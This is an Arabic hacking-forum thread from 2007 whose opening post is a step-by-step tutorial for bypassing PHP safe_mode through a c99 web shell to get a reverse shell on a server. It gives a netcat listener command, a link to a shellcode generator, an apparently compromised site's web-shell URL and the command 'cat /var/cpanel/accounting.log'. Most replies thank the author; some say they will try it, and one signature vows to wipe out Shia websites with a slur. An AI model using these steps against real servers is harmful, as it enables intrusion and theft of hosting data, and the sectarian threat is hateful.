ضع اعلانك هنا

 ضع اعلانك هنا ضع اعلانك هنا منتديات بوابة الاسلام
التاريخ 2008-8-13 التاريخ 2008-8-15 ضع اعلانك هنا ضع اعلانك هنا
 
العودة   عالم المعرفة > قسم الأنظمة والسيرفرات > أمن المواقع والسيرفرات
تحديث الصفحة تجاوز السيف مود وتطبيق أوامر على السيرفر
تفعيل العضوية استرجاع كلمة المرور شروط المنتــدى البحث مشاركات اليوم اجعل كافة الأقسام مقروءة
أمن المواقع والسيرفرات اختراق المواقع , اختراق المنتديات , برنامج اختراق , اختراق السيرفرات , ادوات اختراق , برامج اختراق , تعليم اختراق , شروحات اختراق , دورات اختراق , شل , shell , اخراق سيرفر وندز
 

تجاوز السيف مود وتطبيق أوامر على السيرفر

أمن المواقع والسيرفرات


إضافة رد
صفحة 1 من 3 1 23 >
 
LinkBack أدوات الموضوع
 
قديم 06-06-2007, 10:15 PM   #1 (permalink)
XP

:: فريق عالم المعرفة::
 
الصورة الرمزية XP








XP غير متصل

XP has a spectacular aura aboutXP has a spectacular aura aboutXP has a spectacular aura about

افتراضي تجاوز السيف مود وتطبيق أوامر على السيرفر
السلام عليكم ورحمة الله

كيفكم خواني ان شاء الله بخير

ثغره في كل اصدارات PHP 4 تسمح لك بتجاوز السيف مود وتطبيق أوامر

هناك طريقتين للستغلال من خلال الشل c99 او من خلال رفع ملف php على اي موقع

نشرح الثغره من خلال الشل c99

نبدأ الشرح

نروح لنت كات ونكتب امر التنصت على البورت
بهذا الامر

nc -l -n -vv -p 21



الان تم التنصت على البورت 21

ندخل هذا الموقع طبعا اسم الموقع مشفر في المنتدى لهذا اختصرت رابط الموقع

http://reere.notlong.com/


اكتب رقم اي بيك الحقيقي والبورت 21


تابع الشرح بصوره



الان نقوم بنسخ الشيل كود مثل ماهو موضح بصوره الى "





الان بعد نسخ الكود

نحمل ملف PHP-code من المرفق

ونلصق الكود في اعلى الملف وننزل سطر

ونفتح الشل الي راح نطبق عليه الثغره من خلال خيار PHP-code

http://rnbafisha.ru/admin/img/index.html.php





الان نلصق الكود الي عدلنا عليه ونضغط زر Execute



الان نرجع لنت كات



الان تم الاتصال مع السرفر الان نجرب ننفذ امر cat /var/cpanel/accounting.log



والان تم تطبيق الامر

المصدر ومواضيع تفيد بخصوص الثغره

http://www.milw0rm.com/papers/56
http://www.jaascois.com/research/36601027/
http://www.milw0rm.com/papers/73
http://blogs.technet.com/robert_hens...was-there.aspx
http://underground54.serveurperso.com/hacking.php?id=73
http://osvdb.org/displayvuln.php?osvdb_id=32770



تحميل الشرح مع الصور بصيغة html
الملفات المرفقة
نوع الملف: txt PHP-code.txt‏ (1,019 بايت, المشاهدات 266)

التوقيع

(*) من سب صحابتي فعليه لعنة اللَّه والملائكة والناس أجمعين(*)
رواه الطبراني وهو في سلسلة الألباني الصحيحة

دعاءالشيخ خميس الزهراني

شروط التسجيل والكتابة في المنتدى

موضوع خطيرر تفضل بدخول

(اللهم أرزقنا قبل الموت توبه .. وعند الموت شهاده )

مركز تحميل الصور
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-06-2007, 10:36 PM   #2 (permalink)
عضو فعال
 
الصورة الرمزية Mr-Viros







Mr-Viros غير متصل

Mr-Viros has a spectacular aura aboutMr-Viros has a spectacular aura aboutMr-Viros has a spectacular aura about

افتراضي مشاركة: تجاوز السيف مود وتطبيق أوامر على السيرفر
الله يعطيك ألف ألف عافيه حبيبي XP على الشرح الروعه

بس يالغالي لما يكون السيف مود شغال أقدر أقفله بملف php.ini و لا؟

تحياتي ،،

التوقيع

لا نأسف على غدر الزمان لطالما..

رقصت على جثث الأسوود كلابا..

لا تحسبن برقصها تعلوا على أسيادها..

تبقى الاسود أسود و الكلاب كلاب..

K.s.A HaCkAr

Mr-Viros
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-06-2007, 11:25 PM   #3 (permalink)
XP

:: فريق عالم المعرفة::
 
الصورة الرمزية XP








XP غير متصل

XP has a spectacular aura aboutXP has a spectacular aura aboutXP has a spectacular aura about

افتراضي مشاركة: تجاوز السيف مود وتطبيق أوامر على السيرفر
يسلمو اخوي على مرورك

ملف php.ini ماينفع اذا كان سيف مود

هذا الملف ينفع اذا كان صلاحياتك نو بدي او يوزر يلغي الدوال الممنوعه في السرفر

التوقيع

(*) من سب صحابتي فعليه لعنة اللَّه والملائكة والناس أجمعين(*)
رواه الطبراني وهو في سلسلة الألباني الصحيحة

دعاءالشيخ خميس الزهراني

شروط التسجيل والكتابة في المنتدى

موضوع خطيرر تفضل بدخول

(اللهم أرزقنا قبل الموت توبه .. وعند الموت شهاده )

مركز تحميل الصور
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-07-2007, 12:28 AM   #4 (permalink)
عضو جديد






محمد_!! غير متصل

محمد_!! will become famous soon enoughمحمد_!! will become famous soon enough

افتراضي مشاركة: تجاوز السيف مود وتطبيق أوامر على السيرفر
تسلم اخوي Xp

يعطيك ألف عافيه.
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-07-2007, 04:28 AM   #5 (permalink)

::فريق عالم المعرفة::
 
الصورة الرمزية ShOoT3R






ShOoT3R غير متصل

ShOoT3R has a spectacular aura aboutShOoT3R has a spectacular aura about

افتراضي مشاركة: تجاوز السيف مود وتطبيق أوامر على السيرفر
يسلموااا اخوووي xp
على الشرح الرااائع وجزاك الله الف خير
وجاري التجربة

اخوووي Mr-Viros ملف php.ini

ما ينفع فى صلاحية النوبدى فقط شغال على صلاحية اليوزر
وكذلك يجب ان تكون الداله shell_exec والداله dl غير ممنوعه

التوقيع




ـــــــــــــــــــــــــــــــــ
(( اللهم ارحم المسلمين
والمسلمات الاحياء منهم والاموات ))


شروط التسجيل والمشاركة في المنتدى
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-07-2007, 12:02 PM   #6 (permalink)
عضو جديد






alshakicom غير متصل

alshakicom will become famous soon enoughalshakicom will become famous soon enough

افتراضي مشاركة: تجاوز السيف مود وتطبيق أوامر على السيرفر
يعطك الله العافيه ويسلمو
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-07-2007, 12:27 PM   #7 (permalink)
عضو جديد






smart php غير متصل

smart php will become famous soon enoughsmart php will become famous soon enough

افتراضي مشاركة: تجاوز السيف مود وتطبيق أوامر على السيرفر
طيب كيف ممكن الحماية من هذي الثغره ، بتعطيل الدوال ؟
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-08-2007, 02:51 AM   #8 (permalink)
عضو مميز
 
الصورة الرمزية ALGeNerAL







ALGeNerAL غير متصل

ALGeNerAL will become famous soon enoughALGeNerAL will become famous soon enough

افتراضي مشاركة: تجاوز السيف مود وتطبيق أوامر على السيرفر
مشكوور اخوي xp ع الشرح الوافي

التوقيع

الاختراق هوايتنا والتميز طموحنا والتواضع سبيلنا وابناء المتعة هدفنا
((بأذن الله سوف يتم مسح جميع مواقع الرافضة لعنة الله عليهم))

A L G e N e r A L
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-08-2007, 07:51 AM   #9 (permalink)
عضو فعال
 
الصورة الرمزية QTrXP







QTrXP غير متصل

QTrXP will become famous soon enoughQTrXP will become famous soon enough

افتراضي مشاركة: تجاوز السيف مود وتطبيق أوامر على السيرفر
الله لا يحرمنا من جديدك ياخوي
وتسلم على الشرح وجاري التطبيق

التوقيع

[


منتدى مخصص للدفاع عن النبي صلى الله علية وسلم

http://www.whoismohamad.com/forums/
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-08-2007, 09:34 AM   #10 (permalink)
عضو فعال
 
الصورة الرمزية حموديّ







حموديّ غير متصل

حموديّ will become famous soon enoughحموديّ will become famous soon enough

افتراضي مشاركة: تجاوز السيف مود وتطبيق أوامر على السيرفر
يعطيكـ،الف عأفيه
اخووي آكس بي
تحيآتي
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
إضافة رد
صفحة 1 من 3 1 23 >



« الموضوع السابق | الموضوع التالي »


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة


الساعة الآن 08:36 AM.

عدد الكلمات الدلالية 70 الاكثر بحث في الموقع
الكلمات الدلالية
اخبار ادوات اطفال الاستثمار البرفست البيزون الدروس الروافض السعوديه السنه الشيعه العاب الفلاش الفوتو شوب الكويت المجوس المهدي الهكر ايران برامج برامج اختراق برامج هكر بنات تحميل تشفير تشقير الصفحات تطوير تعليم ثغره جرائم جوال حماية حوار دروس دومين رواتر شرح صميم صوره فضائح فيديو كتاب كراك كمبيوتر محاضرات منتدى مودم نطاق نطاقات نوكيا هوز bifrost buffer crypter domain downloader exploit file inclusion iran local overflow poison python server shellcode sql injection trojan version vulnerability youtube


روابط مهمة

أقسام المنتدى